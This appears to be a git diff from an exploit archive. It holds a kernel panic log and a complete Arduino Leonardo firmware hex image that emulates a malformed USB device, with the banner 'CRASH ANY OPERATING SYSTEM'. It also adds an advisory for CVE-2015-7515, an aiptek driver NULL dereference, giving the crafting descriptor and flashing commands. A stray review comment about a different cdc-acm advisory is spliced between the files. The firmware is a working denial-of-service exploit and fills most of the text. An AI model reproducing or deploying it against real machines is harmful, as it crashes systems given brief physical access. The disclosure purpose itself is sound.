systemd-udevd Not tainted +3.10.0-229.14.1.el7.x86_64 #1 +[ 32.851028] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS +rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 +[ 32.851028] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000 +[ 32.851028] RIP: 0010:[] [] +acm_probe+0x26c/0x11d0 [cdc_acm] +[ 32.851028] RSP: 0018:ffff88000bd23b40 EFLAGS: 00010246 +[ 32.851028] RAX: ffff88000c525800 RBX: 0000000000000000 RCX: ffff88000bd23fd8 +[ 32.851028] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff88000c524c00 +[ 32.851028] RBP: ffff88000bd23bd8 R08: 0000000000000001 R09: 0000000000000000 +[ 32.851028] R10: 0000000000002cad R11: ffffffff810020d8 R12: ffff88000c525800 +[ 32.851028] R13: ffff88000f508692 R14: 0000000000000001 R15: ffff88000bcd0000 +[ 32.851028] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) +knlGS:0000000000000000 +[ 32.851028] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b +[ 32.851028] CR2: 0000000000000008 CR3: 000000000cb87000 CR4: +00000000000006f0 +[ 32.851028] DR0: 0000000000000000 DR1: 0000000000000000 DR2: +0000000000000000 +[ 32.851028] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 +[ 32.851028] Stack: +[ 32.851028] ffff88000bd23ba8 ffff88000d6b3690 ffff88000bd23ba8 00000000436261cb +[ 32.851028] ffff88000bcd0090 0000000000000004 ffff88000bcd0090 +0000000000000202 +[ 32.851028] 0000001000000001 0000000000000200 0000000000000000 +ffff88000bd23bd8 +[ 32.851028] Call Trace: +[ 32.851028] [] usb_probe_interface+0x1c4/0x2f0 +[ 32.851028] [] driver_probe_device+0x87/0x390 +[ 32.851028] [] __driver_attach+0x93/0xa0 +[ 32.851028] [] ? __device_attach+0x40/0x40 +[ 32.851028] [] bus_for_each_dev+0x73/0xc0 +[ 32.851028] [] driver_attach+0x1e/0x20 +[ 32.851028] [] bus_add_driver+0x200/0x2d0 +[ 32.851028] [] driver_register+0x64/0xf0 +[ 32.851028] [] usb_register_driver+0x82/0x160 +[ 32.851028] [] ? 
0xffffffffa039cfff +[ 32.851028] [] acm_init+0xba/0x1000 [cdc_acm] +[ 32.851028] [] do_one_initcall+0xb8/0x230 +[ 32.851028] [] load_module+0x133e/0x1b40 +[ 32.851028] [] ? ddebug_proc_write+0xf0/0xf0 +[ 32.851028] [] ? copy_module_from_fd.isra.42+0x53/0x150 +[ 32.851028] [] SyS_finit_module+0xa6/0xd0 +[ 32.851028] [] system_call_fastpath+0x16/0x1b +[ 32.851028] Code: 5f 5d c3 0f 1f 40 00 48 83 7d d0 00 74 d4 44 39 6d c0 74 +0d f6 05 66 4e 00 00 04 0f 85 0f 0e 00 00 48 39 5d d0 0f 84 ea 06 00 00 <48> +8b 43 08 80 78 05 0a 0f 84 fe 00 00 00 48 8b 45 d0 48 8b 40 +[ 32.851028] RIP [] acm_probe+0x26c/0x11d0 [cdc_acm] +[ 32.851028] RSP +[ 32.851028] CR2: 0000000000000008 +[ 33.230701] ---[ end trace b239663354a1c556 ]--- +[ 33.237071] Kernel panic - not syncing: Fatal exception +[ 33.238044] drm_kms_helper: panic occurred, switching back to text console + +Arduino Leonardo Firmware: + +:100000000C94A8000C94C5000C94C5000C94C50079 +:100010000C94C5000C94C5000C94C5000C94C5004C +:100020000C94C5000C94C5000C94C4050C942F04CA +:100030000C94C5000C94C5000C94C5000C94C5002C +:100040000C94C5000C94C5000C94C5000C94C5001C +:100050000C94C5000C94C5000C94C5000C940E02C1 +:100060000C94C5000C94C5000C94C5000C94C500FC +:100070000C94C5000C94C5000C94C5000C94C500EC +:100080000C94C5000C94C5000C94C5000C94C500DC +:100090000C94C5000C94C5000C94C5000C94C500CC +:1000A0000C94C5000C94C5000C94C5000B030E0302 +:1000B000010305032F032F032F03120316031A0353 +:1000C000200324032F032A030000000200080E006F +:1000D00000030401000B000000000000000000000D +:1000E00000000000000004080201104080401020C1 +:1000F00040804080080204018040201002011080EE +:100100001020404004040404040304050202020217 +:1001100004030202020206060606060604040202A0 +:100120000204000000002300260029002C002F00FC +:1001300000000000250028002B002E0031000000E8 +:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E4EDF3E102C005900D92A436B107D1 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C 
+:10018000E1F70E94C8000C9404070C940000089545 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B +:1001B00083E00E94300361E087E00E94300361E049 +:1001C00088E00E9430030E9459067E012AE9E20E6F +:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93D90188 +:1002C0009C92F4E01196FC9311971496EC93F9012B +:1002D000DC01292D01900D922A95E1F7FE01EC56E3 +:1002E000FF4FDC011B96FC93EE931A971D96BC9270 +:1002F000AE921C971183008373836283558344837A +:100300000C5211092CE0F80111922A95E9F721E02D +:10031000D80119962C931997FE01E059FF4F0190CF +:100320000D929A94E1F7F8019387828761E088E063 +:100330000E9469038BE492E00E94650688E892E0DF +:100340000E94650687EC92E00E94650686E093E0D5 +:100350000E94650682E493E00E9465068FE793E0C1 +:100360000E94650684EA93E00E9465068BEE93E0A6 +:100370000E94650683E00E949F03892B09F047C015 +:100380005E01F3E2AF0EB11C8824839482E1982EC3 +:1003900084E194E00E946506BF92AF92DF92CF9213 +:1003A000FF92EF921F928F921F930F932DB73EB73C +:1003B000225131090FB6F8943EBF0FBE2DBFADB725 +:1003C000BEB71196FE01FB96892D01900D928A957C +:1003D000E1F78DE695E00E94030668E873E180E0AE +:1003E00090E00E947B028DE695E00E944E0660E060 +:1003F00087E00E94690368E873E180E090E00E9472 +:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E +:1004100070E080E090E00E947B02ACCF1F920F92D0 +:100420000FB60F9211242F933F938F939F93AF9307 +:10043000BF938091650590916605A0916705B09185 
+:1004400068053091640523E0230F2D3720F40196D1 +:10045000A11DB11D05C026E8230F0296A11DB11DE7 +:10046000209364058093650590936605A0936705C6 +:10047000B09368058091690590916A05A0916B051C +:10048000B0916C050196A11DB11D809369059093F3 +:100490006A05A0936B05B0936C05BF91AF919F91D6 +:1004A0008F913F912F910F900FBE0F901F90189535 +:1004B0003FB7F8948091690590916A05A0916B050A +:1004C000B0916C0526B5A89B05C02F3F19F0019689 +:1004D000A11DB11D3FBF6627782F892F9A2F620F6C +:1004E000711D811D911D42E0660F771F881F991FA6 +:1004F0004A95D1F70895CF92DF92EF92FF92CF9372 +:10050000DF936B017C010E945802EB01C114D104FE +:10051000E104F10479F00E9458026C1B7D0B683EE7 +:100520007340A0F381E0C81AD108E108F108C8516E +:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029 +:100540000895789484B5826084BD84B5816084BD4B +:1005500085B5826085BD85B5816085BDEEE6F0E03C +:10056000808181608083E1E8F0E010828081826098 +:100570008083808181608083E0E8F0E08081816019 +:100580008083E1E9F0E08081826080838081816006 +:100590008083E0E9F0E0808181608083E1ECF0E03D +:1005A000808184608083808182608083808181609B +:1005B0008083E3ECF0E0808181608083E0ECF0E018 +:1005C000808182608083E2ECF0E0808181608083C2 +:1005D000EAE7F0E0808184608083808182608083AC +:1005E000808181608083808180688083089590E02D +:1005F000FC013197EE30F10590F5EA5AFF4F0C946B +:10060000AB09809180008F7703C0809180008F7D3F +:1006100080938000089584B58F7702C084B58F7D64 +:1006200084BD0895809190008F7707C080919000DD +:100630008F7D03C080919000877F80939000089504 +:100640008091C0008F7703C08091C0008F7D809320 +:10065000C00008958091C200877F8093C2000895F2 +:10066000CF93DF9390E0FC01EA51FF4F2491FC010E +:10067000EC5FFE4F8491882349F190E0880F991F29 +:10068000FC01E25CFE4FA591B491805D9E4FFC01A0 +:10069000C591D4919FB7611108C0F8948C912095B1 +:1006A00082238C93888182230AC0623051F4F894AB +:1006B0008C91322F309583238C938881822B888371 +:1006C00004C0F8948C91822B8C939FBFDF91CF91C3 +:1006D00008950F931F93CF93DF931F92CDB7DEB78B +:1006E000282F30E0F901E853FF4F8491F901EA51D6 +:1006F000FF4F1491F901EC5FFE4F04910023C9F004 
+:10070000882321F069830E94F7026981E02FF0E0DD +:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7 +:100720008C91611103C01095812301C0812B8C93A2 +:100730009FBF0F90DF91CF911F910F910895CF939D +:10074000DF93282F30E0F901E853FF4F8491F9013E +:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5 +:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5 +:10077000EE5DFE4FA591B4912C912D2381E090E088 +:1007800021F480E002C080E090E0DF91CF910895F5 +:10079000615030F02091F100FC0120830196F8CFE8 +:1007A000289884E680937D0508951092E9001092C0 +:1007B00071051092700590936F0580936E050895F2 +:1007C000FF920F931F93CF93DF93F82E8B01EA01D3 +:1007D000BA01C8010E94A606F80120E030E08EEFC1 +:1007E0002C173D0791F1F7FE02C0A49101C0A08132 +:1007F000609170057091710540916E0550916F0583 +:1008000064177507ACF49091E8009570E1F390914E +:10081000E80092FD1CC0A093F100A0917005B0917A +:1008200071051196AF73BB27AB2B11F48093E800D1 +:10083000A0917005B09171051196B0937105A093C8 +:1008400070052F5F3F4F3196CBCFC90102C08FEFAC +:100850009FEFDF91CF911F910F91FF9008951F920D +:100860000F920FB60F9211246F927F928F929F92E8 +:10087000AF92BF92CF92DF92EF92FF920F931F93AE +:100880002F933F934F935F936F937F938F939F9398 +:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3 +:1008A0006297DEBFCDBF1092E9008091E80083FF20 +:1008B00046C168E0CE010A960E94C80382EF809389 +:1008C000E8009A8597FF05C08091E80080FFFCCF83 +:1008D00003C08EEF8093E800892F807609F023C152 +:1008E0008B85811105C01092F1001092F10020C19A +:1008F000282F2D7F213009F41BC1853049F48091C8 +:10090000E80080FFFCCF8C8580688093E30010C1F5 +:10091000863009F0E1C02D8508891989223009F057 +:10092000B3C0EC848E2D90E0209173053091740556 +:10093000821793070CF09FC00E94D5031F92EF927D +:100940008DE394E09F938F930E9483068CE0E89E52 +:1009500070011124E0917505F0917605EE0DFF1DF3 +:1009600089E0DE01119601900D928A95E1F7C801A8 +:100970000E94D50349E050E0BE016F5F7F4F80E0E9 +:100980000E94E0030F900F900F900F90C12CD12C7C +:10099000612C712C33E7A32E34E0B32E4AEA842E67 +:1009A00044E0942EE0917505F0917605EE0DFF1D63 +:1009B000818590E0681679060CF0BAC07F926F923C 
+:1009C000BF92AF920E948306E0917505F091760583 +:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5 +:1009E00080E00E94E0030F900F900F900F9000E0C6 +:1009F00010E0E0917505F0917605EE0DFF1D028483 +:100A0000F385E02DEC0DFD1D818590E00817190799 +:100A10005CF51F930F939F928F920E948306E09143 +:100A20007505F0917605EE0DFF1D0284F385E02D2E +:100A3000EC0DFD1DC801880F991FA485B585A80F71 +:100A4000B91F4D915C910284F385E02DE80FF91FE9 +:100A50006081718180E00E94E0030F5F1F4F0F9063 +:100A60000F900F900F90C5CF8FEF681A780A8EE025 +:100A7000C80ED11C97CF8FED94E09F938F930E9467 +:100A800083060F900F9058C0C8012A8B0E94D5038F +:100A90002A892130C1F0233009F04EC08C851F9285 +:100AA0008F9389EF94E09F938F930E94830642E097 +:100AB00050E062E871E080E00E94E0030F900F9048 +:100AC0000F900F9035C04091000150E060E071E060 +:100AD00080E00E94E0032CC0873071F1883021F45F +:100AE00081E08093F10024C0893011F5937021F5E5 +:100AF000EDE4F1E081E021E096E38093E9002093CA +:100B0000EB0034913093EC009093ED008F5F3196C1 +:100B1000843099F78EE78093EA001092EA008C8582 +:100B20008093720505C0888999890E94D50304C005 +:100B30008EEF8093E80003C081E28093EB00629621 +:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE +:100B5000EF91BF91AF919F918F917F916F915F9135 +:100B60004F913F912F911F910F91FF90EF90DF9048 +:100B7000CF90BF90AF909F908F907F906F900F908D +:100B80000FBE0F901F9018951F920F920FB60F92E5 +:100B900011248F939F938091E1001092E10083FFD5 +:100BA0000FC01092E90091E09093EB001092EC00DE +:100BB00092E39093ED001092720598E09093F0000C +:100BC00082FF1AC080917E05882339F080917E05CE +:100BD000815080937E05882369F080917D0588236C +:100BE00059F080917D05815080937D05811104C06D +:100BF000289A02C05D9AF1CF9F918F910F900FBEFE +:100C00000F901F901895CF93DF93CDB7DEB782E199 +:100C1000FE013596A0E0B1E001900D928A95E1F7D2 +:100C20008F89988D9093760580937505898D9A8D1F +:100C300090937405809373058B8D9C8D90937C05A8 +:100C400080937B058D8D9E8D90937A058093790599 +:100C50008F8D98A1909378058093770510927205F7 +:100C600081E08093D70080EA8093D80082E189BD3B +:100C700009B400FEFDCF61E070E080E090E00E94EA 
+:100C80007B0280E98093D8008CE08093E200109290 +:100C9000E000559A209ADF91CF91089581E08093EA +:100CA000E00008959091C80095FFFCCF8093CE009E +:100CB00008951092CD0087E68093CC0088E1809360 +:100CC000C9008EE08093CA0008950F931F93CF93BD +:100CD000DF93EC018C01FE0101900020E9F73197D0 +:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E +:100CF000F80181918F010E945206EDCFDF91CF91D3 +:100D00001F910F910895CF93DF93CDB7DEB7DA959A +:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6 +:100D2000419151919F0160E071E0CE0101960E94D6 +:100D30000707CE0101960E946506D3950FB6F89479 +:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE +:100D5000AF92BF92CF92DF92EF92FF920F931F93C9 +:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E +:100D70003F932F9389839A830E9483068981882ECB +:100D80009A81992E0F900F9000E010E08EE5E82EEA +:100D900085E0F82E91E1C92E94E0D92E0A151B05A5 +:100DA000E4F4F40181914F0190E09F938F93FF92BF +:100DB000EF920E9483060F5F1F4FC8018F70992723 +:100DC0000F900F900F900F90892B41F7DF92CF92E9 +:100DD0000E9483060F900F90E1CF81E194E09F93F2 +:100DE0008F930E9483060F900F900F900F90DF91CA +:100DF000CF911F910F91FF90EF90DF90CF90BF9018 +:100E0000AF909F908F900895F8940C94E809AEE00D +:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8 +:100E20004C831A83098377FF02C060E070E8615049 +:100E300071097E836D83A901BC01CE0101960E94D8 +:100E400033074D815E8157FD0AC02F8138854217D7 +:100E500053070CF49A01F801E20FF31F10822E964B +:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB +:100E7000B1097C016B018A01FC0117821682838112 +:100E800081FFBDC1CE0101964C01F7019381F601AE +:100E900093FD859193FF81916F01882309F4ABC184 +:100EA000853239F493FD859193FF81916F018532ED +:100EB00029F4B70190E00E941B09E7CF512C312C97 +:100EC00020E02032A0F48B3269F030F4803259F007 +:100ED000833269F420612CC08D3239F0803339F4CB +:100EE000216026C02260246023C0286021C027FD25 +:100EF00027C030ED380F3A3078F426FF06C0FAE00C +:100F00005F9E300D1124532E13C08AE0389E300DA1 +:100F10001124332E20620CC08E3221F426FD6BC1C9 +:100F2000206406C08C3611F4206802C0883641F473 +:100F3000F60193FD859193FF81916F018111C1CFDE 
+:100F4000982F9F7D9554933028F40C5F1F4FFFE33B +:100F5000F9830DC0833631F0833771F0833509F0A2 +:100F60005BC022C0F801808189830E5F1F4F44243B +:100F70004394512C540115C03801F2E06F0E711CDE +:100F8000F801A080B18026FF03C0652D70E002C08B +:100F90006FEF7FEFC5012C870E9410092C018301A0 +:100FA0002C852F77222E17C03801F2E06F0E711CAE +:100FB000F801A080B18026FF03C0652D70E002C05B +:100FC0006FEF7FEFC5012C870E9405092C012C854E +:100FD0002068222E830123FC1BC0832D90E048163D +:100FE0005906B0F4B70180E290E00E941B093A94E0 +:100FF000F4CFF50127FC859127FE81915F01B701B0 +:1010000090E00E941B0931103A94F1E04F1A510808 +:101010004114510471F7E5C0843611F0893639F571 +:10102000F80127FF07C060817181828193810C5F85 +:101030001F4F08C060817181882777FD8095982FA8 +:101040000E5F1F4F2F76B22E97FF09C090958095A7 +:10105000709561957F4F8F4F9F4F2068B22E2AE089 +:1010600030E0A4010E944D09A82EA81844C085377D +:1010700029F42F7EB22E2AE030E025C0F22FF97F2E +:10108000BF2E8F36C1F018F4883579F0B4C08037A0 +:1010900019F0883721F0AFC02F2F2061B22EB4FE97 +:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D +:1010B0009660B92E06C028E030E005C020E130E09F +:1010C00002C020E132E0F801B7FE07C06081718103 +:1010D000828193810C5F1F4F06C06081718180E027 +:1010E00090E00E5F1F4FA4010E944D09A82EA81882 +:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428 +:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0 +:101110007A2C2B2D03C07A2C01C0752C24FF0DC016 +:10112000FE01EA0DF11D8081803311F4297E09C092 +:1011300022FF06C07394739404C0822F867809F04E +:10114000739423FD13C020FF06C05A2C731418F4A7 +:10115000530C5718732C731468F4B70180E290E0B5 +:101160002C870E941B0973942C85F5CF731410F4FF +:10117000371801C0312C24FF12C0B70180E390E082 +:101180002C870E941B092C8522FF17C021FF03C05A +:1011900088E590E002C088E790E0B7010CC0822F9C +:1011A000867859F021FD02C080E201C08BE227FD64 +:1011B0008DE2B70190E00E941B09A51438F4B70135 +:1011C00080E390E00E941B095A94F7CFAA94F4019F +:1011D000EA0DF11D8081B70190E00E941B09A1106A +:1011E000F5CF332009F451CEB70180E290E00E94A0 +:1011F0001B093A94F6CFF7018681978102C08FEFE1 
+:101200009FEF2C96E2E10C94CD09FC010590615012 +:1012100070400110D8F7809590958E0F9F1F08950C +:10122000FC016150704001900110D8F780959095B5 +:101230008E0F9F1F08950F931F93CF93DF93182F47 +:10124000092FEB018B8181FD03C08FEF9FEF20C041 +:1012500082FF10C04E815F812C813D814217530770 +:101260007CF4E881F9819F012F5F3F4F3983288308 +:10127000108306C0E885F985812F0995892B29F708 +:101280002E813F812F5F3F4F3F832E83812F902FF1 +:10129000DF91CF911F910F910895FA01AA2728306D +:1012A00051F1203181F1E8946F936E7F6E5F7F4F33 +:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF +:1012C000781F891F9A1FA11D680F791F8A1F911D02 +:1012D000A11D6A0F711D811D911DA11D20D009F452 +:1012E00068943F912AE0269F11243019305D319394 +:1012F000DEF6CF010895462F4770405D4193B3E07D +:101300000FD0C9F7F6CF462F4F70405D4A3318F023 +:10131000495D31FD4052419302D0A9F7EACFB4E0D4 +:10132000A6959795879577956795BA95C9F700978C +:101330006105710508959B01AC010A2E069457952D +:10134000479537952795BA95C9F7620F731F841F84 +:10135000951FA01D0895EE0FFF1F0590F491E02D3D +:1013600009942F923F924F925F926F927F928F9249 +:101370009F92AF92BF92CF92DF92EF92FF920F9324 +:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E +:10139000F894DEBF0FBECDBF09942A8839884888EB +:1013A0005F846E847D848C849B84AA84B984C88481 +:1013B000DF80EE80FD800C811B81AA81B981CE0F78 +:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D +:0413D000F894FFCFBF +:1013D4001201000200000040AD0BEFBE000101024B +:1013E4000001220342006100640020004200410029 +:1013F40042004500250078002500780025006E0095 +:1014040025007000180342004100440020004300FE +:10141400300046004600450045002100120100024C +:1014240000000040820403020001010203010902DA +:10143400270001010000FA0705810304040C0705D5 +:10144400010204000C0705820104000C07000700D8 +:101454000700480100500072006F006C00690066CC +:101464000069006300000A550000006BFD180A00C3 +:10147400809F0AB901312B940A8101128946001315 +:10148400000257028B0A5E0AF80A5F01F212010099 +:1014940002010000400D055702000101020301B9D9 +:1014A4000A0100F80A5F0A810A220342006100640B 
+:1014B400002000420041004200450025007800253C +:1014C40000780025006E00250070001803420041DA +:1014D400004400200043003000460046004500451B +:1014E40000210012010002010000400D0557020016 +:1014F400010102030109040000030100000003F2DA +:101504000AEC0A0902270001010000FA01AB0A09EA +:101514000400000301000000090200202020202014 +:101524005F5F5F5F5F5F5F5F2020202020202020BF +:1015340020202020202020202020202020202020A7 +:1015440020205F5F5F5F5F205F5F20205F2020209F +:101554002020205F5F0A0D00202020202F205F5FC5 +:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3 +:101574005F5F20205F5F5F5F5F20202020202F209F +:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3 +:10159400202F5F5F0A0D002020202F202F202020E5 +:1015A4002F205F5F205C2F205F5F20602F205F5F14 +:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A +:1015C400205C2F205F5F2F202F205F5F5F2F202F55 +:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009 +:1015E4002F202F202F202F5F2F202F202F5F2F2001 +:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0 +:101604002F202F5F2F202F202F5F5F2F202C3C0AAD +:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07 +:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F +:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4 +:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044 +:101654003C3C2043485241534820414E59204F506E +:1016640045524154494E472053595354454D203E09 +:101674003E0A0D00203C3C202863292053657267F4 +:10168400656A20536368756D696C6F20323031353B +:101694002C204F70656E536F7572636520536563BC +:1016A40075726974792052616C66205370656E6E30 +:1016B4006562657267203E3E0A0D000A3E3E205078 +:1016C4007265737320627574746F6E20746F207307 +:1016D4007461727420657865637574696F6E2E2EFB +:1016E4002E0A0D005B44454255475D2045786563ED +:1016F400757465207061796C6F616420300A0D0027 +:10170400526563762D446174613A0A0D005B444569 +:101714004255475D200953656E6420436F6E6669C8 +:101724006775726174696F6E44657363726970740E +:101734006F720928696E6465783A2569292E2E2E00 +:101744000D0A005B44454255475D200953656E64AC +:1017540020496E74657266616365204465736372C3 +:101764006970746F720928696E7465726661636565 
+:101774003A2569292E2E2E0D0A005B444542554711 +:101784005D200953656E6420456E64706F696E74E4 +:101794002044657363726970746F720928656E649E +:1017A400706F696E743A2569292E2E2E0D0A005B1E +:1017B40044454255475D203C3C70616E6963206D31 +:1017C4006F64653F3E3E0D0A005B44454255475DEC +:1017D4002009203E3E20537472696E67204465736D +:1017E40063726970746F72207265717565737420A9 +:1017F4002D2073656E64696E67206D616C666F720F +:101804006D656420737472696E67212073657475E5 +:10181400702E7756616C75654C203D3D2025690D11 +:101824000A005B48455844554D505D0A0D0025306B +:041834003258200006 +:00000001FF diff --git a/platforms/linux/dos/39544.txt b/platforms/linux/dos/39544.txt new file mode 100755 index 000000000..ee41b8168 --- /dev/null +++ b/platforms/linux/dos/39544.txt 
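Review bot: The root-cause paragraph ("the cdc-acm driver assumes that there will be at least two interface-descriptors") understates what the quoted source actually shows: the NULL dereference at line 1229 is only reachable through the `quirks == NO_UNION_NORMAL` branch at 1094–1097, where `usb_ifnum_to_if(usb_dev, 1)` returns NULL for a one-interface configuration and is never checked, so the bug depends on the device matching a quirk entry in the driver's id table (presumably why idVendor 0x482 / idProduct 0x203 was chosen — worth confirming against the quirk table). I would add after "This results in a crash of the system." a sentence such as `This path is taken only for devices flagged NO_UNION_NORMAL in cdc-acm's device table; the fix is to check both usb_ifnum_to_if() results for NULL before skip_normal_probe and fail the probe with -ENODEV.` The advisory also carries no mitigation section, and since the vendor had shipped no patch at publication a practitioner needs one: blacklisting cdc_acm where no ACM modem is expected, or restricting enumeration of unknown USB devices (usbguard, `authorized_default=0`), should be stated as the interim workaround. Finally, "Severity: Critical" beside a CVSS of 4.9 with AV:L and availability-only impact reads as an inconsistency; saying explicitly that the rating reflects an unrecoverable panic reachable with physical port access would reconcile the two.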
@@ -0,0 +1,614 @@
+OS-S Security Advisory 2016-05
+Linux aiptek Nullpointer Dereference
+
+Date: March 4th, 2016
+Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
+CVE: CVE-2015-7515
+CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
+Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid
+USB device descriptors (aiptek driver)
+Severity: Critical. The Kernel panics. A reboot is required.
+Ease of Exploitation: Trivial
+Vulnerability type: Wrong input validation
+Products: RHEL 7.1 including all updates
+Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
+CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
+Vendor: Red Hat
+Vendor contacted: November, 12th 2015
+PDF of Advisory: https://os-s.net/advisories/OSS-2016-05_aiptek.pdf
+
+Abstract:
+The Kernel 3.10.0-229.20.1.el7.x86_64 crashes when presented a buggy USB
+device using the aiptek driver.
+
+Detailed product description:
+We confirmed the bug on the following system:
+RHEL 7.1
+Kernel 3.10.0-229.20.1.el7.x86_64
+Further products or kernel versions have not been tested.
+How reproducible: Always
+Actual results: Kernel crashes.
+
+Description:
+The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
+(github.com/schumilo) using the following device descriptor:
+
+[*] Device-Descriptor
+bLength: 0x12
+bDescriptorType: 0x1
+bcdUSB: 0x200
+bDeviceClass: 0x3
+bDeviceSubClass: 0x0
+bDeviceProtocol: 0x0
+bMaxPacketSize: 0x40
+idVendor: 0x458
+idProduct: 0x5003
+bcdDevice: 0x100
+iManufacturer: 0x1
+iProduct: 0x2
+iSerialNumbers: 0x3
+bNumConfigurations: 0x1
+[*] Configuration-Descriptor
+bLength: 0x9
+bDescriptorType: 0x2
+wTotalLength: 0x27
+bNumInterfaces: 0x1
+bConfigurationValue: 0x1
+iConfiguration: 0x0
+bmAttributes: 0x0
+bMaxPower: 0x31
+[*] Interface-Descriptor
+bLength: 0x9
+bDescriptorType: 0x4
+bInterfaceNumber: 0x0
+bAlternateSetting: 0x0
+bNumEndpoints: 0x0
+bInterfaceClass: 0x0
+bInterfaceSubClass: 0x0
+bInterfaceProtocol: 0x0
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x81
+bmAttribut: 0x3
+wMaxPacketSize: 0x404
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x1
+bmAttribut: 0x2
+wMaxPacketSize: 0x4
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x82
+bmAttribut: 0x1
+wMaxPacketSize: 0x4
+bInterval: 0xc
+
+The aiptek driver assumes that there will be at least one endpoint-descriptor.
+If the interface-descriptor contains a zero-value for bNumEndpoints or no
+endpoint-descriptor is provided, the driver tries to dereference a null-
+pointer and the kernel crashes:
+
+****
+$ nm aiptek.ko.debug | grep aiptek_probe
+0000000000001ea0 t aiptek_probe
+$ addr2line -e aiptek.ko.debug 2303
+/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
+64/drivers/input/tablet/aiptek.c:1830
+****
+
+**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/input/tablet/aiptek.c)
+
+1822 endpoint = &intf->altsetting[0].endpoint[0].desc; /* Nullpointer */
+1823
+1824 /* Go set up our URB, which is called when the tablet receives
+1825 * input.
+1826 */
+1827 usb_fill_int_urb(aiptek->urb,
+1828 aiptek->usbdev,
+1829 usb_rcvintpipe(aiptek->usbdev,
+1830 endpoint->bEndpointAddress), /* Nullpointer-
+Dereference */
+1831 aiptek->data, 8, aiptek_irq, aiptek,
+1832 endpoint->bInterval);
+****
+
+Proof of Concept:
+For a proof of concept, we are providing an Arduino Leonardo firmware file. This
+firmware will emulate the defective USB device.
+
+avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
+flash:w:binary.hex
+
+The firmware has been attached to this bug report.
+To prevent the automated delivery of the payload, a jumper may be used to
+connect port D3 and 3V3!
+
+Severity and Ease of Exploitation:
+The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
+only physical access to the system is required.
+
+Vendor Communication:
+We contacted Red Hat on the November, 12th 2015.
+A patch was provided on the November, 25th 2015.
